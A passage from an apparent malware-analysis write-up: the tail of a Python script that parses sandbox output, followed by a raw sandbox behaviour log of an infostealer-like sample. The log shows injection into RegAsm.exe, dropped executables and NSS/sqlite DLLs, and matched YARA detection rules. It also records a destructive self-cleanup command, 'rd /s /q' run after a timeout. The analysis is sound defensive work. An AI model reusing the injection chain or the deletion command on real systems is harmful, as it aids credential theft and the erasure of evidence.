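        m = STR_RE.match(line)  # the more specific pattern goes first
        if m:
            strings.append((int(m["addr"], 16), int(m["n"]), m["src"]))
            continue
        m = CODE_RE.match(line)
        if m:
            code.append((int(m["pid"]), int(m["run"]), int(m["addr"], 16), m["src"]))
    return code, strings


def region(addr):
    """Classify an address as injected image or mapped module (assumed split)."""
    return "image" if IMAGE_LO <= addr < IMAGE_HI else "module"


def summarise(code):
    """Per analysis process id: count of flagged functions inside the injected
    image versus in mapped modules, plus the address span of the module ones."""
    by_pid = defaultdict(list)
    for pid, _run, addr, _src in code:
        by_pid[pid].append(addr)
    out = {}
    for pid, addrs in sorted(by_pid.items()):
        mods = [a for a in addrs if region(a) == "module"]
        out[pid] = {
            "image": sum(1 for a in addrs if region(a) == "image"),
            "module": len(mods),
            "module_span": (min(mods), max(mods)) if mods else None,
        }
    return out


def decrypt_candidates(strings):
    """String routines ordered by hit count, most-called first: the hottest
    ones inside the image are the first breakpoints to set for string recovery."""
    return sorted(strings, key=lambda t: (-t[1], t[0]))


if __name__ == "__main__":
    code, strings = parse_report(SAMPLE)
    for pid, s in summarise(code).items():
        print(f"process {pid}: {s}")
    for addr, n, _src in decrypt_candidates(strings):
        print(f"{addr:08X} {region(addr):6} x{n}")
```

Feed the whole report's text to `parse_report` instead of `SAMPLE` to get the full picture; the module-address span for process 29 then covers the NSS and sqlite DLLs that the report shows being dropped into C:\ProgramData, which is why so many flagged functions sit outside the injected image.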
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1760
Source: file.exe Static PE information: invalid certificate
Source: file.exe, 00000000.00000002.1244342672.000000000160E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: userFBKFCFBFID.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: userIEHDAFHDHC.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DHCGHDHIDH.exe.29.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HDAFIIDAKJ.exe.29.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@49/63@3/6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBA7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 3_2_6CBA7030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 3_2_004190A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004365E0 CoCreateInstance, 24_2_004365E0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log Jump to behavior
Source: C:\ProgramData\HDAFIIDAKJ.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6228:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3168
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user~1\AppData\Local\Temp\delays.tmp Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: HJKKFI.29.dr, IIJJDGHJKKJEBFHJDBGH.3.dr, GIJKKK.29.dr, GDHDAEBGCAAFIDGCGDHI.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKFCFBFID.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userFBKFCFBFID.exe "C:\Users\userFBKFCFBFID.exe"
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIEHDAFHDHC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userIEHDAFHDHC.exe "C:\Users\userIEHDAFHDHC.exe"
Source: C:\Users\userIEHDAFHDHC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userIEHDAFHDHC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\DHCGHDHIDH.exe "C:\ProgramData\DHCGHDHIDH.exe"
Source: C:\ProgramData\DHCGHDHIDH.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\DHCGHDHIDH.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\HDAFIIDAKJ.exe "C:\ProgramData\HDAFIIDAKJ.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HDAFIIDAKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 1704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIIJDHCGCBK" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKFCFBFID.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIEHDAFHDHC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userFBKFCFBFID.exe "C:\Users\userFBKFCFBFID.exe" Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userIEHDAFHDHC.exe "C:\Users\userIEHDAFHDHC.exe" Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\DHCGHDHIDH.exe "C:\ProgramData\DHCGHDHIDH.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\HDAFIIDAKJ.exe "C:\ProgramData\HDAFIIDAKJ.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIIJDHCGCBK" & exit Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
